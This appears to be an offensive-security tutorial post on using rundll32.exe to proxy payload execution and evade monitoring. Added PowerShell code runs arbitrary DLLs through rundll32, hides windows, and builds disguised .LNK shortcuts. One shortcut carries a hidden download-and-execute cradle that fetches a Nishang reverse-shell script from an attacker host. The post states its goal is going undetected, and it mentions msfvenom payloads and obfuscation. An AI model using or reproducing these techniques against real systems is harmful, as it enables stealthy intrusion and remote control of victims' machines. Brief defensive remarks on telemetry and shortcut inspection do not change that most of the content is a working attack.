The rundll32.exe program can be called to execute an arbitrary binary. Adversaries take advantage of this to proxy execution of their code through rundll32.exe and avoid triggering security tools: rundll32.exe is often whitelisted, or simply not monitored, because Windows itself uses it so frequently for normal operations that alerting on it produces false positives.
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.
This is a useful way to execute C2 binaries during post-exploitation, for example when we need to upgrade a plain reverse shell to a C2 framework.
Information about our machine:
What about viewing our network connections?
rundll32 shell32.dll,Control_RunDLL ncpa.cpl
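The invocation forms discussed above, launched from PowerShell, as an added example that is not code from the original post. It also lists what process telemetry records for them, which is the flip side of the whitelisting point made earlier. sysdm.cpl and the payload path C:\Users\Public\u.dll are placeholders chosen here for illustration.

```powershell
# Added example, not code from the original post: the rundll32 invocation
# forms discussed above, launched from PowerShell, followed by a look at what
# process telemetry records for them. sysdm.cpl and the payload path
# C:\Users\Public\u.dll are placeholders chosen here for illustration.

$rundll32 = "$env:SystemRoot\System32\rundll32.exe"

# PowerShell splits an unquoted "shell32.dll,Control_RunDLL" into two
# arguments at the comma, so keep each full argument string in one quoted value.
$forms = @(
    'shell32.dll,Control_RunDLL ncpa.cpl'         # Control Panel item: Network Connections
    'shell32.dll,Control_RunDLLAsUser sysdm.cpl'  # the AsUser export, same argument form
)
if (Test-Path 'C:\Users\Public\u.dll') {
    # Arbitrary DLL: rundll32 expects "<dll>,<export>". "0" is a placeholder
    # export name, usable when the DLL does its work from DllMain (an
    # assumption about the payload DLL, not something rundll32 guarantees).
    $forms += 'C:\Users\Public\u.dll,0'
}

foreach ($a in $forms) {
    Start-Process -FilePath $rundll32 -ArgumentList $a
}
Start-Sleep -Seconds 2

# The .cpl forms hand off to the Control Panel host and may already have
# exited. Whatever is still running is just rundll32.exe plus a command line;
# that command line, the parent process and any network activity are all a
# detection has to go on, which is why rundll32 is so often left unmonitored.
Get-CimInstance Win32_Process -Filter "Name = 'rundll32.exe'" |
    Select-Object ProcessId, ParentProcessId, CommandLine |
    Format-Table -AutoSize -Wrap
```

The comma gotcha is worth remembering when scripting this: `rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl` typed straight into a PowerShell prompt passes `shell32.dll` and `Control_RunDLL` as separate arguments and fails, whereas the same line works unchanged in cmd.exe.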
Calling a Shell
Let's make this better. Our job is to go undetected, and that big blue PowerShell window is a major red flag. Let's hide it with -w 1 (short for -WindowStyle Hidden; 1 is the numeric value of Hidden).
No blue window this time, but did it work?
Let's go a step further and hide it so the shell can be called remotely, by setting up a shortcut (.LNK) that calls back to our payload. We will need to shorten a few names, such as the IP address and the file name, to a few characters, because the shortcut's target field only accepts a limited number of characters. Right-click >> New >> Shortcut,
then add the full path to the payload into the shortcut's properties (the target or URL path field).
Below we can see that our payload was successfully called and executed.
No output? No worries: this kind of payload prints nothing on the victim, so the absence of an error is the sign that the code ran. The real confirmation is the callback arriving at our listener.
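The .LNK procedure above, built programmatically, as an added example that is not code from the original post. Using the WScript.Shell COM object sets the target and its arguments as separate properties instead of typing one long line into the New Shortcut dialog's target box. Assumptions: the attacker host 10.10.14.5, the DLL C:\Users\Public\u.dll and the script name p.ps1 are placeholders (kept short for the same reason the post shortens its names), "0" as the export name assumes a DLL that runs its payload from DllMain, and the download cradle in the second shortcut is a common way of fetching a remote script such as Nishang's, not something taken from the post.

```powershell
# Added example, not code from the original post: create the .lnk described
# above with the WScript.Shell COM object instead of the New Shortcut dialog.
# Assumptions: 10.10.14.5, C:\Users\Public\u.dll and p.ps1 are placeholders;
# "0" assumes a DLL whose payload runs from DllMain; the download cradle in
# the second shortcut is a common choice, not the post's own command.

function New-CallbackShortcut {
    param(
        [Parameter(Mandatory)] [string] $LnkPath,
        [Parameter(Mandatory)] [string] $Target,
        [string] $Arguments = ''
    )
    $wsh = New-Object -ComObject WScript.Shell
    $lnk = $wsh.CreateShortcut($LnkPath)
    $lnk.TargetPath       = $Target
    $lnk.Arguments        = $Arguments
    $lnk.WorkingDirectory = Split-Path $Target
    $lnk.WindowStyle      = 7   # 7 = minimised; 1 = normal, 3 = maximised
    $lnk.IconLocation     = "$env:SystemRoot\System32\shell32.dll,3"
    $lnk.Save()
    # Read it back: this is also how a defender triages a suspicious .lnk.
    $wsh.CreateShortcut($LnkPath) | Select-Object TargetPath, Arguments, WindowStyle
}

$desktop = [Environment]::GetFolderPath('Desktop')

# 1. Shortcut that proxies a DLL payload (e.g. one built with msfvenom)
#    through rundll32.exe. "0" is a placeholder export name (see assumptions).
New-CallbackShortcut -LnkPath (Join-Path $desktop 'Update.lnk') `
    -Target "$env:SystemRoot\System32\rundll32.exe" `
    -Arguments 'C:\Users\Public\u.dll,0'

# 2. Shortcut that fetches and runs a remote PowerShell script (for instance
#    Nishang's Invoke-PowerShellTcp) with -w 1 (-WindowStyle Hidden) so no
#    console window appears. The cradle below is an assumption, not the post's.
New-CallbackShortcut -LnkPath (Join-Path $desktop 'Help.lnk') `
    -Target "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" `
    -Arguments '-w 1 -nop -c "IEX (New-Object Net.WebClient).DownloadString(''http://10.10.14.5/p.ps1'')"'
```

The read-back at the end of the function is deliberate: a .lnk shows only its icon and name in Explorer, so inspecting TargetPath and Arguments through the same COM object is the quickest way to see what a shortcut will actually launch, on either side of the engagement.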
As you can see, rundll32 is a convenient way to execute files and to gain a foothold on a machine. I used basic tools: msfvenom to create the DLL payload, and a simple Nishang PowerShellTcp payload for the script being called remotely. There are of course other ways: obfuscation can be added to avoid detection, and other files can be executed; they do not need to be the ones I used, which were chosen only as common payloads to demonstrate the technique.